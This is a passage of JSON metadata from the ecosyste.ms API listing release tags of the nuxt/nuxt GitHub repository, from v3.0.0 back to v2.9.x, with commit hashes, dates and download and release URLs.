url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a6